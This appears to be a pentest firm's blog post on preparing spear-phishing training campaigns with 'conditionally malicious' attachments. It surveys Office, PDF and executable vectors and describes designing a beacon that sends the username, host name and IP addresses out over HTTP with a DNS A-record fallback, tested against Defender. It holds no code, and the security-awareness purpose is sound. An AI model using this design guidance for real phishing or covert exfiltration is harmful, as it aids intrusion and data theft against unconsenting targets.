Spear phishing: experience creating conditionally malicious executable files for phishing emails


We already wrote about targeted phishing (Spear Phishing) in one of our articles, which covered the general aspects of targeted e-mail distribution. In this article, we suggest that you familiarize yourself with our experience in training targeted mailings containing conditionally malicious attachments.

Typically, targeted mailings include the following steps:

  • preliminary search for employee accounts in various data sources
  • employee pre-training
  • discussion and approval with the customer of the templates of the letters sent
  • preparation for mailing
  • targeted mailing to employees who have undergone training, and possibly employees who have not undergone training (control group)
  • collecting data from mailing to data sets
  • processing datasets to understand the current situation
  • offer specific recommendations for the customer
  • consolidation of results and retraining of employees

As part of this article, we will focus on the preparation for the targeted mailing.

If the distribution is carried out as part of the work related to the Pentest and RedTeam, then the search for employee accounts takes a fairly large amount of time and human resources. Next, the resulting list of accounts should be formed into target groups for distribution, after which letter templates for each group are generated.

Based on the specifics of the company’s work and the specifics of the target group, it is necessary to draw up the most plausible templates for letters that employees will receive. Sometimes we resort to templates with the “update” of some guidance document.

At this stage, you also need to choose what types of attachments in the letters we will use. In our experience, these are usually the following file types:

  • .docx, .doc
  • .xlsx, .xls
  • .exe
  • pdf

MS Office files have the advantage that they are familiar to the user and are likely to be opened to view them (if the spam filter does not cut them as malicious). The downsides are that there are not many ways to launch a conditionally malicious load and organize feedback with the management server:

  • macros
  • known vulnerabilities (DDE, etc.)
  • SMB (external files, documents attached to the MS Office file by reference)

With macros, everything is relatively simple, there are automation tools for creating such macros, they can be used with some modifications. The attachment can be ready for distribution in a few hours or in the worst case days, if the antivirus that is supposed to be installed on the victim “swears” at the load.

With SMB, everything is also quite easy. automation tools process, however, it is necessary that the user meets the condition of no blocking of outgoing SMB traffic to port 445. Some companies and providers block such traffic.

There are not so many vulnerabilities that lead to code execution in MS Office, but you need to understand that not all companies and not all workstations have the ability to update office software. If we know that a particular employee of the customer has an outdated set of software on the computer, then we can try to use such vectors, in the hope that the antivirus software is also not updated.

If we worked in a market where other office software is distributed, such as the Urdu InPage file viewer common in Asia, we would choose other file types for such an office application and use known vulnerabilities in it.

With the PDF format, you can also consider several options for creating a load:

  • Js
  • known vulnerabilities
  • SMB (external files, documents attached to the file by reference)

In the PDF viewer engine, it is possible to include JS code inside the document for greater customization. This allows you to include JS code in the document and execute it on the user’s computer. This method is quite well detected by antiviruses and therefore is not very suitable for our tasks, we do not recommend using it. Exactly the same situation with known vulnerabilities, antiviruses well detect the code that leads to the vulnerability trigger.

With SMB, the situation is less rosy than in MS Office, the leak of NetNTLM hashes in the most common Adobe Reader and FoxitReader is considered a vulnerability and it was fixed, for example, in Adobe Reader in 2018 (CVE-2018-4993). Therefore, when preparing the load in the form of PDF, you need to rely on other viewers of PDF documents or very outdated versions above indicated.

Executable files (.exe, etc.) have the advantage that the methods of communication with the organizer of the distribution are limited mainly to the protocols allowed in the company for employee computers (tcp, udp, http, icmp, etc.), and that you can collect a lot of information about the user who will open such a file. Cons, of course, are that antivirus software can mark a distributed file as malicious and the entire distribution can be cut even at the stage of mail delivery with an antispam filter with integrated antivirus software. An additional minus is that modern Windows operating systems mark a file downloaded from the Internet, placing additional information in an alternative NTFS stream, and when the file is launched, they offer the user to agree to launch the application.

Why did you need your own development of a training mailing list program?

All samples of the free mailing list software that we studied (SpearPhisher, King Phisher, Gophish) do not offer the automatic creation of conditionally malicious load in the form of an executable file according to a template built into the software. They leave this, so to speak, for the “exercise of the curious reader.”


We approach the development of software with a description of the functions that it should perform.

The main function of the software will be the identification of the user of the target company, who will “swallow the bait” and launch the application, so first of all you need to decide on the data that the application running on the computer should collect. How full is this set, practice will show, if you think that we did not select all the identifiers that allow you to set a user from the target company, write to us in the comments about this.

For ourselves, we defined this data as follows:

  • Username
  • computer name
  • external and internal IP address (if possible)

Then we will determine by which communication channels we will give the collected data. We chose two:

  • HTTP
  • DNS

HTTP was chosen to verify access to the Internet from the network where our software is launched. If access to the Internet does not require the use of a proxy or other conditions, then this increases the risk of infection of the organization.

DNS was chosen as a backup data transmission channel, since it is quite rare for a company to restrict access to DNS servers and traffic that passes through the DNS channel. In DNS, we selected A records as the most likely channel for information leakage.

Also, do not forget that antivirus software, HIPS, can be installed on the target computer. And it also leaves its mark on software development. It is necessary to add an item to the software development cycle that is associated with testing software detection by popular antiviruses. For ourselves, we determined the minimum testing as one antivirus – Defender, since it is included in the Windows 10 assembly by default.

To collect data received via the DNS channel, we specially configured A-records at the registrar of our domain. The essence of the settings is to ensure that all requests for subdomains of our domain are sent to our NS, where we simply install tcpdump on port 53. This is the minimum effort required to register data sent by our application.

Interesting points on the way to release

It turned out that it is not worthwhile to include non-ASCII characters in packets intended for transferring A-records over the DNS channel. This means that the usernames or computers written in Cyrillic, Farsi, etc., turn into scribbles 🙂 We decided to choose base32 encoded character encoding, since all the characters included in it can be used for DNS transfers in A records. Although, while searching for existing solutions, we came across the fact that using base64 is also acceptable for most modern DNS servers. Also, data longer than 63 characters must be divided into several packages or subdomains. Of course, a situation is quite rare in which the username or computer name will be longer than 63 characters, but if in the future you want to exfiltrate more data than we indicated in the wishes for the program, you will have to take this fact into account.

To determine the external IP address, one has to rely either on uncontrolled resources, which can also affect the quality of the collected results if such a resource is blocked in the target company or region, or rely on its own resources. Therefore, by agreement with the Customer, it is necessary to use external hosts that are not blocked in the network of the organization under study for exfiltration of data, or use services from unlikely blocked networks (Azure, Amazon, DO), relying on luck.

Since there may be several internal addresses on the target computer, we decided to focus on the first one in the list and collect only it. This assumption is made on the basis of the fact that a phishing funnel will most likely pass through an ordinary employee with an ordinary computer with 1 network address.


After starting the load on the target host, we received requests coming from the ASN owned by Microsoft in France, however, after that, after a while, information about the launch of our application began to come from the ASN of Asian countries – Korea, China, India. Once again it was confirmed that modern anti-virus and anti-phishing solutions send suspicious files from their point of view to their cloud and run tests on their own virtual machines to make sure that these files are harmful.

The identifiers of virtual machines from the MS cloud are all typical, an arbitrary computer name, the same username. But computer identifiers from Asia represent more human-readable data (Computer, Admin-PC, USERPC, etc.). On the one hand, this may mean that our files were opened from a location hidden behind a VPN, on the other hand, that anti-virus companies share fresh files with each other.

Since we created non-personalized application builds, it was not possible to track which specific files were sent to the cloud. Maybe all the files from the mailing list, and maybe only those that were sent first. With a high probability, in future releases we will think out a patch mechanism for each attachment and send an application with the user ID to which the letter is addressed – it will be easier to track files that are checked on cloud virtual machines. This is necessary to eliminate false positive data received by the server collecting information.


The success of phishing attacks is facilitated by a low level of user awareness of the rules of working with mail in the company. Spam filters remain the main protection against mass phishing, but this does not save spear phishing (targeted phishing).

In my opinion, one should not discount the importance of social engineering in the context of work related to penetration testing. The human factor will always be a loophole for cybercriminals in the security system of even the largest company. If even a small percentage of employees launch malware on the organization’s network (especially for privileged employees – top management, system administrators), this will mean a compromise of the entire company.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *